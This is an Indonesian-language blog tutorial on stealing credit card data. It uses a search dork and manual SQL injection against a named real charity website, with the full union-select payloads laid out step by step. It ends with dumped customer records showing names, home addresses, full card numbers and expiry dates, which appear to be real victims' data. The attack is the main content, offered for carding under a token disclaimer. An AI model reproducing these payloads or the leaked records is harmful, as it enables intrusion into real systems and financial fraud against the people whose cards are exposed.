cma sekedar berbagi aja gak ada maksut lain..
cari cc ala orang awam (gw)..
1. cari target...
cari target bisa pake dork, contoh:
dapet target..
2. cari bug's (langkah yg paling membosankan..)
cari bug's yg rada2 ribet, soalnya gak semua target mempunyai bug's yg bisa di exploitasi (injek2).
bisanya ane cari bug's jga pake dork..
tpi berhubung disini target dah dalam bentuk siap test bug's jadi langsung aja.
dan hasilnya..
version mysqld-5.5.15, jadi bisa diinjek2 dengan metode sql injection...
3. injek2..
injek2 bisa pke tools andalan, havij, darkmysqli, sqlmap dkk..
tpi disini ane kasih manual..
3.a
jadi
angka ajaib bisa diliat langsung...
3.b
tables
hasil
3.c
cek columns
disini ane ambil table alzpdf_booklet to hex = 616c7a7064665f626f6f6b6c6574
hasil
3.d
dump..
disini ane dump bbrapa columns
hasil
sebenernya sih ccnya bukan cma ada didalam table alzpdf_booklet doang, ada banyak ccnya, sayang gak ada cvvnya..
SAYA TIDAK BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TUTORIAL INI
by satality32
cari cc ala orang awam (gw)..
1. cari target...
cari target bisa pake dork, contoh:
Code:
intext:"visa" "Credit Card Number:" "Expiration Date:"
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567
2. cari bug's (langkah yg paling membosankan..)
cari bug's yg rada2 ribet, soalnya gak semua target mempunyai bug's yg bisa di exploitasi (injek2).
bisanya ane cari bug's jga pake dork..
Code:
filetype:php site:target.com
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 5.1 Driver][mysqld-5.5.15]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
/ssl/register.asp, line 30
version mysqld-5.5.15, jadi bisa diinjek2 dengan metode sql injection...
3. injek2..
injek2 bisa pke tools andalan, havij, darkmysqli, sqlmap dkk..
tpi disini ane kasih manual..
3.a
Code:
+order+by+1--
dst..
ketemu sampai.
+order+by+28--
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
3.b
tables
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.tables+where+table_schema=database()--
Code:
alzdenvermimauction,alzearlystageforum,alzemailanote,alzevercare,alzevercare_springs,alzgolftournament,alzhelpline,alznecklace,alznecklace2,alznewsletter_preferences,alzpdf_booklet,alzperspectives,alzperspectives2,alzpolarplunge,alzpostanote,alzsurvey1,alzsurvey2,alzsurvey3,alzsymposium,alzsymposium2010,alzsymposium_new,alztime,alztimereporting,alztributeflag_denver,alzwhyplunge,customers,formfields,forms,plainscentercontactus,plainscenterdonate,plainscenterdonotemail,plainscenterevents,plainscentergiftmembership,plainscenterjoin,plainscentermembers,plainscenternewsletteremails,plainscenternewsletters,plainscenternewslettertesters,plainscenterregister,plainscenterusers,plainscentervolunteer,states,wingsbricks,wingscontactus,wingscontactus_events,wingsdonations,wingsdonotemail,wingsevents,wingskit_item,wingsmembers,wingsnewsletters,wingsnewslettersignup,wingsnewslettertestemails,wingsregister,wingswasp_counties,wingswasp_evaluation,wingswasp_kit_info,wingswasp_kit_item,wingswasp_locations,wingswasp_member,wing
3.c
cek columns
disini ane ambil table alzpdf_booklet to hex = 616c7a7064665f626f6f6b6c6574
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,database(),group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+information_schema.columns+where+table_name=0x616c7a7064665f626f6f6b6c6574--
Code:
entrydatetime,First_Name,Last_Name,Organization,Address,City,State,Zip_Code,Phone_Number,Email_Address,Name_On_CreditCard,Credit_Card_Type,Credit_Card_Number,Credit_Card_Expiration_Month,Credit_Card_Expiration_Year,Total,id,Comments,bookletoption
3.d
dump..
disini ane dump bbrapa columns
Code:
First_Name,0x3a,Last_Name,0x3a,Address,0x3a,City,0x3a,State,0x3a,Credit_Card_Type,0x3a,Credit_Card_Number,0x3a,Credit_Card_Expiration_Month,0x3a,Credit_Card_Expiration_Year
Code:
https://plainscenter.org/ssl/register.asp?eventnumber=567+and+1=0+union+all+select+1,database(),group_concat(First_Name,0x3a,Last_Name,0x3a,Address,0x3a,City,0x3a,State,0x3a,Credit_Card_Type,0x3a,Credit_Card_Number,0x3a,Credit_Card_Expiration_Month,0x3a,Credit_Card_Expiration_Year),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+alzpdf_booklet--
Code:
david:lampe:111 main:denver:co:VISA:444444444444444:February:2011,david:lampe:111 main:denver:co:VISA:444444444444444:February:2011,john:doe:111 main:denver:co:VISA:44444444444444:February:2011,david:lampe:888 main:denver:co:VISA:444444444444444444:February:2011,david:lampe:222 main:denver:co:VISA:444444444444444:February:2011,david:lampe:222 main:denver:co:VISA:444444444444444:February:2011,Nancy:Schier Anzelmo:2351 Sunset Blvd Ste 170-143:Rocklin:CA:VISA:4388523010180631:March:2013,Mary:Weathersby:2088 Forest St:Denver:CO:MasterCard:5438050146021957:March:2012,Paulette:Hope:8822 S Holland Court:Littleton:CO:VISA:4388576033861181:May:2012,Corkey:Waite:2110 Evenson Dr:Onalaska:wi:MasterCard:5466042011022983:September:2013,Paulette: Hope:8822 S Holland Court:Littleton:CO:VISA:4388576033861181:May:2012,Chrstine:Garrett:11449 W. 105th Way:Wesminster:CO:VISA:4060425063010464:February:2012,Christian:Fussy:4360 South Abilene Circle:Aurora:CO:MasterCard:5291497359878134:March:2012,Mary:Yamada:PO Box 425:Los Alamos
SAYA TIDAK BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TUTORIAL INI
by satality32
0 comments:
Post a Comment
Silahkan Om Tinggalkan jejak di blog ini | Semua Orang dapat berkomentar di Blog ini dan Bila Om tidak punya akun Gmail / OpenID , om dapat mengunakan Fitur Tanpa Nama , jadi Om bisa berkomentar di blog ini , tp ingat om komentarnya jangan Gunakan bahasa kasar / jorok , karena blog ini di baca di seluruh dunia
==>> Komentar Mu adalah Harimau mu <<==